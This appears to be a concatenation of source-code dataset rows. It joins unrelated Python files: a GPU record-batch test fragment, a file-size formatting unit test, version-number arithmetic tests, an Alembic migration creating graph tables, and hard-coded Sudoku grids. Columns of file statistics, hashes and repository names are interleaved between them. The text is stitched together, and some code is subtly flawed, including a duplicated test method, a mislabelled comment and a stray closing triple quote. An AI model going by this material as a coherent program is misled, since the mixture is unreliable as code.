name_buf_off = json_rb[1]['data_buffer']['offset']
name_buf_len = json_rb[1]['data_buffer']['length']
name_buf = gpu_data[name_buf_off:][:name_buf_len]
assert json_rb[1]['dtype']['name'] == 'DICTIONARY'
name_size = json_rb[1]['length']
name_data = np.ndarray(shape=name_size, dtype=np.int32,
buffer=name_buf.copy_to_host())
print(name_data)
# Get "name" column
weight_buf_off = json_rb[2]['data_buffer']['offset']
weight_buf_len = json_rb[2]['data_buffer']['length']
weight_buf = gpu_data[weight_buf_off:][:weight_buf_len]
assert json_rb[2]['dtype']['name'] == 'DOUBLE'
weight_size = json_rb[2]['length']
weight_data = np.ndarray(shape=weight_size, dtype=np.float64,
buffer=weight_buf.copy_to_host())
print(weight_data)
# verify data
sortedidx = np.argsort(idx_data)
idx_data = idx_data[sortedidx]
name_data = name_data[sortedidx]
weight_data = weight_data[sortedidx]
got_iter = zip(idx_data, name_data, weight_data)
for expected, got in zip(get_expected_values(), got_iter):
assert expected[0] == got[0]
assert expected[1] == dictdata[got[1]]
assert expected[2] == got[2]
| 71.162162
| 2,917
| 0.722845
| 2,097
| 10,532
| 3.549356
| 0.151168
| 0.59734
| 0.711004
| 0.722289
| 0.577455
| 0.49738
| 0.465135
| 0.400645
| 0.379417
| 0.36101
| 0
| 0.318912
| 0.078238
| 10,532
| 147
| 2,918
| 71.646259
| 0.447775
| 0.011679
| 0
| 0.053097
| 0
| 0.017699
| 0.661058
| 0.631827
| 0
| 1
| 0
| 0
| 0.106195
| 1
| 0.017699
| false
| 0
| 0.044248
| 0
| 0.070796
| 0.070796
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
673354e3055a7b1d71b08746c1c94df14e4db352
| 4,429
|
py
|
Python
|
TestFileSize1000_3.py
|
ytyaru/Python.FileSize.201702071138
|
569c45d5e9b91befbaece50520eb69955e148c65
|
[
"CC0-1.0"
] | null | null | null |
TestFileSize1000_3.py
|
ytyaru/Python.FileSize.201702071138
|
569c45d5e9b91befbaece50520eb69955e148c65
|
[
"CC0-1.0"
] | 6
|
2017-02-09T00:54:50.000Z
|
2017-02-09T10:56:13.000Z
|
TestFileSize1000_3.py
|
ytyaru/Python.FileSize.201702071138
|
569c45d5e9b91befbaece50520eb69955e148c65
|
[
"CC0-1.0"
] | null | null | null |
import unittest
import FileSize
from decimal import Decimal
class TestFileSize1000_3(unittest.TestCase):
def test_999(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 999
self.assertEqual(self.__target.Get(actual), "999 B")
def test_1000(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1000
self.assertEqual(self.__target.Get(actual), "1 KB")
def test_1023(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1023
self.assertEqual(self.__target.Get(actual), "1.02 KB")
def test_1024(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1024
self.assertEqual(self.__target.Get(actual), "1.02 KB")
def test_1000KB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1000 * 1000 - 1
self.assertEqual(self.__target.Get(actual), "999.99 KB")
def test_1MB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1000 * 1000
self.assertEqual(self.__target.Get(actual), "1 MB")
def test_1000MB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 2) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 MB")
def test_1GB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 2) * 1000)
self.assertEqual(self.__target.Get(actual), "1 GB")
def test_1000GB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 3) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 GB")
def test_1TB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 3) * 1000)
self.assertEqual(self.__target.Get(actual), "1 TB")
def test_1000TB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 4) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 TB")
def test_1PB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 4) * 1000)
self.assertEqual(self.__target.Get(actual), "1 PB")
def test_1000PB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 5) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 PB")
def test_1EB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 5) * 1000)
self.assertEqual(self.__target.Get(actual), "1 EB")
def test_1000EB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 6) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 EB")
def test_1ZB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 6) * 1000)
self.assertEqual(self.__target.Get(actual), "1 ZB")
def test_1000ZB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 7) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 ZB")
def test_1YB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 7) * 1000)
self.assertEqual(self.__target.Get(actual), "1 YB")
def test_1000YB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 8) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 YB")
def test_1YB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 7) * 1000)
self.assertEqual(self.__target.Get(actual), "1 YB")
| 47.117021
| 88
| 0.671032
| 617
| 4,429
| 4.47812
| 0.097245
| 0.14477
| 0.101339
| 0.159247
| 0.882012
| 0.882012
| 0.882012
| 0.868621
| 0.779949
| 0.779949
| 0
| 0.11064
| 0.202077
| 4,429
| 93
| 89
| 47.623656
| 0.671194
| 0
| 0
| 0.333333
| 0
| 0
| 0.028681
| 0
| 0
| 0
| 0
| 0
| 0.238095
| 1
| 0.238095
| false
| 0
| 0.035714
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
673e386142a796b3285cf69ff042edd4f8d665b3
| 130
|
py
|
Python
|
src/teams/models/__init__.py
|
ighanim/aws-cost-anomaly-alerts
|
ad6d601c7dbdfbdf22f174ea16e76c7ef268edda
|
[
"MIT"
] | null | null | null |
src/teams/models/__init__.py
|
ighanim/aws-cost-anomaly-alerts
|
ad6d601c7dbdfbdf22f174ea16e76c7ef268edda
|
[
"MIT"
] | null | null | null |
src/teams/models/__init__.py
|
ighanim/aws-cost-anomaly-alerts
|
ad6d601c7dbdfbdf22f174ea16e76c7ef268edda
|
[
"MIT"
] | null | null | null |
from .adaptive_card_elements import factSet
from .adaptive_card_elements import fact
from .adaptive_card_elements import textBlock
| 43.333333
| 45
| 0.892308
| 18
| 130
| 6.111111
| 0.444444
| 0.327273
| 0.436364
| 0.654545
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084615
| 130
| 3
| 45
| 43.333333
| 0.92437
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
67953587e7978cd283fb91f0db8d14881eee4c33
| 2,474
|
py
|
Python
|
tests/test_math.py
|
CPSuperstore/PyVersionNumber
|
eef7dc45469603c0875c8359c562a72f48fe761c
|
[
"MIT"
] | null | null | null |
tests/test_math.py
|
CPSuperstore/PyVersionNumber
|
eef7dc45469603c0875c8359c562a72f48fe761c
|
[
"MIT"
] | null | null | null |
tests/test_math.py
|
CPSuperstore/PyVersionNumber
|
eef7dc45469603c0875c8359c562a72f48fe761c
|
[
"MIT"
] | null | null | null |
import unittest
import sys
sys.path.append('..')
from PyVersionNumber import VersionNumber
class TestCaseMath(unittest.TestCase):
def test_addition(self):
self.assertEqual(VersionNumber(1, 2, 3) + VersionNumber(3, 2, 1), VersionNumber(4, 4, 4))
self.assertEqual(VersionNumber(1, 2, 3) + VersionNumber(1, 2, 3), VersionNumber(2, 4, 6))
self.assertEqual(VersionNumber(1, 1, 1) + VersionNumber(2, 2, 2), VersionNumber(3, 3, 3))
def test_subtraction(self):
self.assertEqual(VersionNumber(1, 2, 3) - VersionNumber(3, 2, 1), VersionNumber(-2, 0, 2))
self.assertEqual(VersionNumber(1, 2, 3) - VersionNumber(1, 2, 3), VersionNumber(0, 0, 0))
self.assertEqual(VersionNumber(1, 1, 1) - VersionNumber(2, 2, 2), VersionNumber(-1, -1, -1))
def test_multiplication(self):
self.assertEqual(VersionNumber(1, 2, 3) * VersionNumber(3, 2, 1), VersionNumber(3, 4, 3))
self.assertEqual(VersionNumber(1, 2, 3) * VersionNumber(1, 2, 3), VersionNumber(1, 4, 9))
self.assertEqual(VersionNumber(1, 1, 1) * VersionNumber(2, 2, 2), VersionNumber(2, 2, 2))
def test_division(self):
self.assertEqual(VersionNumber(1, 2, 3) / VersionNumber(3, 2, 1), VersionNumber(0, 1, 3))
self.assertEqual(VersionNumber(1, 2, 3) / VersionNumber(1, 2, 3), VersionNumber(1, 1, 1))
self.assertEqual(VersionNumber(1, 1, 1) / VersionNumber(2, 2, 2), VersionNumber(0, 0, 0))
def test_floor_division(self):
self.assertEqual(VersionNumber(1, 2, 3) // VersionNumber(3, 2, 1), VersionNumber(0, 1, 3))
self.assertEqual(VersionNumber(1, 2, 3) // VersionNumber(1, 2, 3), VersionNumber(1, 1, 1))
self.assertEqual(VersionNumber(1, 1, 1) // VersionNumber(2, 2, 2), VersionNumber(0, 0, 0))
def test_exponent(self):
self.assertEqual(VersionNumber(1, 2, 3) ** VersionNumber(3, 2, 1), VersionNumber(1, 4, 3))
self.assertEqual(VersionNumber(1, 2, 3) ** VersionNumber(1, 2, 3), VersionNumber(1, 4, 27))
self.assertEqual(VersionNumber(1, 1, 1) ** VersionNumber(2, 2, 2), VersionNumber(1, 1, 1))
def test_modulus(self):
self.assertEqual(VersionNumber(1, 2, 3) % VersionNumber(3, 2, 1), VersionNumber(1, 0, 0))
self.assertEqual(VersionNumber(1, 2, 3) % VersionNumber(1, 2, 3), VersionNumber(0, 0, 0))
self.assertEqual(VersionNumber(1, 1, 1) % VersionNumber(2, 2, 2), VersionNumber(1, 1, 1))
if __name__ == '__main__':
unittest.main()
| 52.638298
| 100
| 0.652789
| 343
| 2,474
| 4.661808
| 0.09621
| 0.323952
| 0.36773
| 0.380863
| 0.861163
| 0.861163
| 0.859912
| 0.859912
| 0.859912
| 0.859912
| 0
| 0.09392
| 0.182296
| 2,474
| 46
| 101
| 53.782609
| 0.69649
| 0
| 0
| 0
| 0
| 0
| 0.004042
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| false
| 0
| 0.085714
| 0
| 0.314286
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
67c42738b5c6c07406322f85ebd4a8e80e63155a
| 3,278
|
py
|
Python
|
timesketch/migrations/versions/654121a84a33_.py
|
wajihyassine/timesketch
|
b099d1afb33d0b9f906a0ad407979c8f22a54476
|
[
"Apache-2.0"
] | 1,810
|
2015-01-03T22:34:45.000Z
|
2022-03-30T10:23:18.000Z
|
timesketch/migrations/versions/654121a84a33_.py
|
wajihyassine/timesketch
|
b099d1afb33d0b9f906a0ad407979c8f22a54476
|
[
"Apache-2.0"
] | 1,291
|
2015-01-08T00:00:12.000Z
|
2022-03-29T03:26:58.000Z
|
timesketch/migrations/versions/654121a84a33_.py
|
wajihyassine/timesketch
|
b099d1afb33d0b9f906a0ad407979c8f22a54476
|
[
"Apache-2.0"
] | 519
|
2015-01-20T09:26:06.000Z
|
2022-03-29T11:02:10.000Z
|
"""Add Graph and GraphCache models
Revision ID: 654121a84a33
Revises: fc7bc5c66c63
Create Date: 2020-11-16 21:02:36.249989
"""
# revision identifiers, used by Alembic.
revision = '654121a84a33'
down_revision = 'fc7bc5c66c63'
from alembic import op
import sqlalchemy as sa
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('graph',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('sketch_id', sa.Integer(), nullable=True),
sa.Column('name', sa.UnicodeText(), nullable=True),
sa.Column('description', sa.UnicodeText(), nullable=True),
sa.Column('graph_config', sa.UnicodeText(), nullable=True),
sa.Column('graph_elements', sa.UnicodeText(), nullable=True),
sa.Column('graph_thumbnail', sa.UnicodeText(), nullable=True),
sa.Column('num_nodes', sa.Integer(), nullable=True),
sa.Column('num_edges', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['sketch_id'], ['sketch.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('graphcache',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('sketch_id', sa.Integer(), nullable=True),
sa.Column('graph_plugin', sa.UnicodeText(), nullable=True),
sa.Column('graph_config', sa.UnicodeText(), nullable=True),
sa.Column('graph_elements', sa.UnicodeText(), nullable=True),
sa.Column('num_nodes', sa.Integer(), nullable=True),
sa.Column('num_edges', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['sketch_id'], ['sketch.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('graph_comment',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('comment', sa.UnicodeText(), nullable=True),
sa.Column('parent_id', sa.Integer(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['parent_id'], ['graph.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('graph_label',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('label', sa.Unicode(length=255), nullable=True),
sa.Column('parent_id', sa.Integer(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['parent_id'], ['graph.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('graph_label')
op.drop_table('graph_comment')
op.drop_table('graphcache')
op.drop_table('graph')
# ### end Alembic commands ###
| 40.469136
| 66
| 0.669311
| 409
| 3,278
| 5.254279
| 0.171149
| 0.122848
| 0.188925
| 0.232666
| 0.791531
| 0.789204
| 0.767799
| 0.765472
| 0.703583
| 0.703583
| 0
| 0.019497
| 0.139414
| 3,278
| 80
| 67
| 40.975
| 0.74229
| 0.095485
| 0
| 0.612903
| 0
| 0
| 0.173839
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.032258
| 0
| 0.064516
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67c9030818c75de83803b6eecb210c3c660e11e2
| 15,725
|
py
|
Python
|
sudoku.py
|
NavSanya/ML-Sudoku-Analysis
|
51c22a444e518e367840415fcad52a3e12f4d13a
|
[
"MIT"
] | 3
|
2021-04-21T03:54:51.000Z
|
2021-11-03T04:19:33.000Z
|
sudoku.py
|
NavSanya/ML-Sudoku-Analysis
|
51c22a444e518e367840415fcad52a3e12f4d13a
|
[
"MIT"
] | null | null | null |
sudoku.py
|
NavSanya/ML-Sudoku-Analysis
|
51c22a444e518e367840415fcad52a3e12f4d13a
|
[
"MIT"
] | 2
|
2021-04-15T03:29:42.000Z
|
2022-02-10T01:12:54.000Z
|
#CSCI 191T Biology inspired ML
#Project 1
#Sudoku solver
import numpy as np
sudoku1 = [ [0,0,0,4,0,0,2,0,0],
[7,0,8,5,2,6,0,9,0],
[5,0,0,0,1,0,0,0,0],
[2,3,5,0,0,0,0,0,1],
[0,0,6,0,7,0,4,0,0],
[4,0,0,0,0,0,6,3,9],
[0,0,0,0,3,0,0,0,7],
[0,6,0,1,5,2,9,0,4],
[0,0,4,0,0,8,0,0,0]]
sudoku2 = [ [0,0,0,0,1,2,8,4,5],
[0,1,0,7,0,0,0,3,0],
[0,8,0,6,0,9,0,0,0],
[2,0,0,0,0,7,4,0,0],
[0,0,5,0,0,0,9,0,0],
[0,0,8,9,0,0,0,0,2],
[0,0,0,1,0,3,0,9,0],
[0,3,0,0,0,4,0,8,0],
[1,5,9,2,6,0,0,0,0]]
sudoku3 = [ [9,8,7,0,0,0,3,0,0],
[1,6,0,0,8,0,0,9,0],
[0,0,0,0,0,4,1,0,6],
[0,2,0,0,0,6,0,0,8],
[0,0,0,5,0,7,0,0,0],
[3,0,0,9,0,0,0,6,0],
[2,0,8,4,0,0,0,0,0],
[0,7,0,0,1,0,0,5,9],
[0,0,5,0,0,0,8,2,3]]
sudoku4 = [ [0,1,6,0,0,0,0,3,0],
[8,0,0,9,0,0,2,0,6],
[0,0,0,0,0,0,0,5,8],
[0,7,2,4,0,6,0,0,0],
[0,6,9,0,7,0,4,2,0],
[0,0,0,3,0,5,9,6,0],
[1,3,0,0,0,0,0,0,0],
[6,0,4,0,0,1,0,0,5],
[0,2,0,0,0,0,8,1,0]]
sudoku5 = [ [0,3,0,6,0,5,0,8,0],
[7,0,0,3,0,0,0,0,0],
[0,0,0,9,7,0,5,4,0],
[0,6,7,0,0,0,3,0,8],
[0,2,0,0,0,0,0,6,0],
[4,0,9,0,0,0,7,5,0],
[0,9,5,0,3,4,0,0,0],
[0,0,0,0,0,7,0,0,2],
[0,7,0,1,0,6,0,9,0]]
sudoku6 = [ [1,0,0,5,0,6,0,9,0],
[0,3,0,0,8,0,4,0,0],
[6,0,0,0,7,0,1,0,2],
[0,0,0,0,0,7,0,2,4],
[7,0,0,0,9,0,0,0,8],
[9,2,0,6,0,0,0,0,0],
[3,0,2,0,5,0,0,0,6],
[0,0,1,0,6,0,0,5,0],
[0,9,0,8,0,1,0,0,7]]
sudoku7 = [ [0,0,0,0,0,5,1,7,0],
[5,0,9,6,0,1,0,8,0],
[0,8,2,0,4,0,0,0,5],
[0,0,3,0,0,0,0,0,0],
[0,1,0,8,0,7,0,2,0],
[0,0,0,0,0,0,5,0,0],
[7,0,0,0,9,0,6,5,0],
[0,5,0,4,0,6,7,0,8],
[0,3,6,5,0,0,0,0,0]]
sudoku8 = [ [4,0,0,0,0,1,3,0,0],
[0,2,0,0,3,0,0,7,6],
[0,0,0,0,0,9,0,4,8],
[0,6,0,0,0,7,2,5,0],
[0,1,0,0,4,0,0,3,0],
[0,5,7,3,0,0,0,9,0],
[6,7,0,1,0,0,0,0,0],
[1,9,0,0,5,0,0,6,0],
[0,0,5,8,0,0,0,0,3]]
sudoku9 = [ [5,0,0,0,4,7,0,8,0],
[0,7,0,5,0,0,0,0,0],
[9,0,8,0,6,0,0,2,5],
[0,2,0,0,0,3,0,0,0],
[7,0,0,8,0,6,0,0,3],
[0,0,0,9,0,0,0,4,0],
[2,1,0,0,3,0,8,0,6],
[0,0,0,0,0,9,0,5,0],
[0,8,0,1,2,0,0,0,7]]
sudoku10 = [[3,2,0,0,8,0,0,0,1],
[0,5,0,0,0,0,0,0,9],
[8,9,1,0,7,0,3,0,0],
[5,1,0,0,4,0,0,0,0],
[0,0,0,7,0,3,0,0,0],
[0,0,0,0,6,0,0,9,4],
[0,0,8,0,3,0,9,4,6],
[4,0,0,0,0,0,0,8,0],
[9,0,0,0,1,0,0,5,3]]
sudoku11 = [[2,0,0,0,0,1,0,6,8],
[1,8,4,0,0,0,0,0,0],
[7,0,0,0,0,2,9,0,0],
[0,4,1,0,2,0,0,7,0],
[0,0,7,0,0,0,8,0,0],
[0,6,0,0,3,0,1,5,0],
[0,0,5,2,0,0,0,0,4],
[0,0,0,0,0,0,2,8,7],
[4,9,0,3,0,0,0,0,6]]
sudoku12 = [[6,1,0,0,0,9,0,0,2],
[0,0,0,2,0,0,0,0,5],
[0,0,5,1,6,4,8,0,0],
[2,3,0,0,0,5,1,0,0],
[0,0,0,0,0,0,0,0,0],
[0,0,9,3,0,0,0,4,8],
[0,0,6,9,1,8,5,0,0],
[5,0,0,0,0,3,0,0,0],
[8,0,0,7,0,0,0,9,6]]
sudoku13 = [[0,0,0,0,2,8,0,0,0],
[0,7,0,9,4,0,0,1,6],
[6,0,0,0,0,0,2,0,8],
[0,3,0,0,6,2,0,0,0],
[0,0,2,4,0,7,9,0,0],
[0,0,0,3,9,0,0,7,0],
[1,0,7,0,0,0,0,0,4],
[5,2,0,0,3,4,0,8,0],
[0,0,0,7,8,0,0,0,0]]
sudoku14 = [[0,0,4,9,0,0,0,2,0],
[5,2,0,6,0,0,0,0,7],
[0,3,0,0,0,0,0,4,6],
[8,0,0,3,7,0,2,0,0],
[0,0,5,0,6,0,4,0,0],
[0,0,2,0,5,9,0,0,8],
[4,1,0,0,0,0,0,8,0],
[2,0,0,0,0,1,0,6,9],
[0,6,0,0,0,3,7,0,0]]
sudoku15 = [[0,6,8,0,0,9,0,0,0],
[0,1,0,0,6,0,0,5,0],
[7,0,0,5,0,1,8,0,0],
[6,0,2,0,4,0,0,7,5],
[0,0,0,0,0,0,0,0,0],
[3,5,0,0,1,0,2,0,9],
[0,0,5,3,0,6,0,0,1],
[0,9,0,0,2,0,0,3,0],
[0,0,0,1,0,0,7,9,0]]
sudoku16 = [[0,0,0,4,0,2,8,1,6],
[0,0,0,8,6,7,0,2,0],
[0,0,6,0,0,0,0,0,0],
[7,0,5,6,0,0,0,0,0],
[9,0,0,3,0,5,0,0,1],
[0,0,0,0,0,4,2,0,9],
[0,0,0,0,0,0,4,0,0],
[0,7,0,9,1,3,0,0,0],
[6,5,2,7,0,8,0,0,0]]
sudoku17 = [[0,6,0,1,0,0,2,0,0],
[0,3,0,0,2,4,6,0,7],
[0,0,2,0,0,0,0,0,8],
[0,0,0,0,0,0,5,0,4],
[0,7,8,2,0,6,9,3,0],
[3,0,1,0,0,0,0,0,0],
[6,0,0,0,0,0,3,0,0],
[2,0,3,9,7,0,0,1,0],
[0,0,4,0,0,8,0,2,0]]
sudoku18 = [[0,4,0,9,0,6,0,0,0],
[0,0,8,0,0,0,4,7,1],
[0,7,3,0,1,0,0,6,2],
[0,0,4,0,0,3,0,1,0],
[0,0,0,0,0,0,0,0,0],
[0,1,0,6,0,0,8,0,0],
[1,9,0,0,3,0,2,4,0],
[3,2,5,0,0,0,7,0,0],
[0,0,0,5,0,2,0,9,0]]
sudoku19 = [[0,2,8,0,0,0,0,0,9],
[0,0,4,0,0,2,8,3,0],
[0,9,0,8,0,6,0,0,0],
[0,0,6,0,0,8,0,7,0],
[0,3,0,4,0,7,0,2,0],
[0,4,0,6,0,0,9,0,0],
[0,0,0,2,0,1,0,8,0],
[0,6,2,7,0,0,1,0,0],
[3,0,0,0,0,0,2,4,0]]
sudoku20 = [[0,0,7,3,0,0,8,0,0],
[8,0,3,1,5,0,0,9,0],
[0,0,1,6,0,0,0,0,0],
[7,9,0,0,0,0,2,1,6],
[0,0,0,0,0,0,0,0,0],
[1,8,2,0,0,0,0,3,4],
[0,0,0,0,0,5,4,0,0],
[0,5,0,0,2,8,1,0,3],
[0,0,4,0,0,3,9,0,0]]
sudoku21 = [[1,3,4,5,0,6,0,9,0],
[0,0,0,0,0,9,0,0,0],
[6,9,0,0,7,1,0,0,0],
[4,0,3,0,0,0,1,0,0],
[0,1,0,0,0,0,0,7,0],
[0,0,2,0,0,0,5,0,4],
[0,0,0,1,9,0,0,4,6],
[0,0,0,8,0,0,0,0,0],
[0,5,0,7,0,3,9,8,1]]
sudoku22 = [[1,0,3,0,0,2,7,8,0],
[0,0,0,0,0,3,2,0,0],
[0,4,6,0,7,5,0,0,1],
[0,0,1,0,0,0,8,0,4],
[0,0,0,0,0,0,0,0,0],
[7,0,8,0,0,0,5,0,0],
[6,0,0,9,4,0,1,5,0],
[0,0,9,3,0,0,0,0,0],
[0,1,4,7,0,0,3,0,9]]
sudoku23 = [[0,0,7,0,5,0,0,2,9],
[4,9,0,0,0,0,7,6,0],
[0,0,0,0,1,0,0,0,0],
[1,3,0,5,0,0,0,7,0],
[0,7,4,0,0,0,8,3,0],
[0,8,0,0,0,3,0,1,2],
[0,0,0,0,4,0,0,0,0],
[0,4,9,0,0,0,0,8,6],
[7,5,0,0,9,0,1,0,0]]
sudoku24 = [[0,1,0,0,7,0,0,0,0],
[0,7,6,9,0,0,8,5,3],
[0,0,0,3,0,4,0,0,0],
[0,6,7,0,5,0,2,0,9],
[0,0,0,0,0,0,0,0,0],
[1,0,8,0,9,0,7,4,0],
[0,0,0,1,0,7,0,0,0],
[2,8,1,0,0,9,4,6,0],
[0,0,0,0,2,0,0,9,0]]
sudoku25 = [[0,5,0,0,0,2,0,0,9],
[0,0,0,0,1,9,0,0,7],
[0,0,8,3,4,0,0,0,0],
[0,0,0,4,0,0,0,9,3],
[7,0,3,9,2,8,4,0,5],
[9,6,0,0,0,5,0,0,0],
[0,0,0,0,9,3,8,0,0],
[2,0,0,7,6,0,0,0,0],
[3,0,0,8,0,0,0,1,0]]
sudoku26 = [[0,0,0,2,8,0,0,0,0],
[4,9,0,0,0,5,0,2,0],
[0,0,2,0,0,0,5,3,7],
[9,0,0,0,0,8,0,7,0],
[0,0,7,1,0,2,4,0,0],
[0,8,0,3,0,0,0,0,6],
[7,4,6,0,0,0,9,0,0],
[0,1,0,5,0,0,0,6,3],
[0,0,0,0,7,1,0,0,0]]
sudoku27 = [[0,0,7,0,0,0,0,0,0],
[1,0,9,5,6,0,0,0,0],
[0,5,0,0,0,8,0,0,2],
[8,3,2,0,0,6,1,0,0],
[7,4,0,0,0,0,0,9,6],
[0,0,6,2,0,0,4,8,3],
[2,0,0,9,0,0,0,5,0],
[0,0,0,0,4,7,6,0,8],
[0,0,0,0,0,0,3,0,0]]
sudoku28 = [[8,0,0,4,5,0,7,0,0],
[0,0,0,0,2,0,3,0,0],
[9,0,7,3,0,8,0,0,2],
[0,6,0,0,0,0,0,0,3],
[0,8,4,0,9,0,2,7,0],
[7,0,0,0,0,0,0,5,0],
[2,0,0,6,0,7,5,0,4],
[0,0,8,0,4,0,0,0,0],
[0,0,5,0,1,3,0,0,9]]
sudoku29 = [[0,5,0,0,8,0,6,4,0],
[0,0,7,0,0,1,9,0,0],
[3,0,0,0,2,9,0,0,1],
[0,0,8,0,0,2,0,7,3],
[0,0,0,0,5,0,0,0,0],
[2,9,0,8,0,0,1,0,0],
[6,0,0,9,1,0,0,0,7],
[0,0,2,3,0,0,4,0,0],
[0,3,1,0,7,0,0,5,0]]
sudoku30 = [[1,0,0,8,5,0,3,0,6],
[0,0,0,0,6,0,0,8,0],
[5,0,8,0,0,4,0,0,9],
[0,0,0,3,0,0,0,0,1],
[0,9,1,0,0,0,2,7,0],
[3,0,0,0,0,2,0,0,0],
[9,0,0,6,0,0,1,0,7],
[0,5,0,0,9,0,0,0,0],
[8,0,7,0,4,3,0,0,2]]
#list containing each sudoku puzzle before any modifications
sudoList_Non_NP = [sudoku1, sudoku2,sudoku3,sudoku4,sudoku5,sudoku6,sudoku7,
sudoku8,sudoku9,sudoku10,sudoku11,sudoku12,sudoku13,sudoku14,
sudoku15,sudoku16,sudoku17,sudoku18,sudoku19,sudoku20,
sudoku21,sudoku22,sudoku23,sudoku24,sudoku25,sudoku26,
sudoku27,sudoku28,sudoku29,sudoku30]
"""
